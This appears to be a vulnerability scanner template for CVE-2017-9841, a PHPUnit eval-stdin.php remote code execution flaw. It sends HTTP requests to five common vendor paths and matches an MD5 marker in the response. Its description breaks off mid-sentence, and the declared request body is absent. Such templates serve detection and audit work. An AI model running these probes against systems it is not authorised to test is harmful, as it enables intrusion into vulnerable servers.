id: CVE-2017-9841 info: name: CVE-2017-9841 author: Random_Robbie,pikpikcu severity: high description: Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP code via HTTP POST data beginning with a " - | GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 Connection: close Content-Length: 17 Accept: */* Accept-Language: en Content-Type: text/html Accept-Encoding: gzip, deflate - | GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 Connection: close Content-Length: 17 Accept: */* Accept-Language: en Content-Type: text/html Accept-Encoding: gzip, deflate - | GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 Connection: close Content-Length: 17 Accept: */* Accept-Language: en Content-Type: text/html Accept-Encoding: gzip, deflate - | GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 Connection: close Content-Length: 17 Accept: */* Accept-Language: en Content-Type: text/html Accept-Encoding: gzip, deflate - | GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 Connection: close Content-Length: 17 Accept: */* Accept-Language: en Content-Type: text/html Accept-Encoding: gzip, deflate matchers-condition: and matchers: - type: word words: - "6dd70f16549456495373a337e6708865" part: body - type: status status: - 200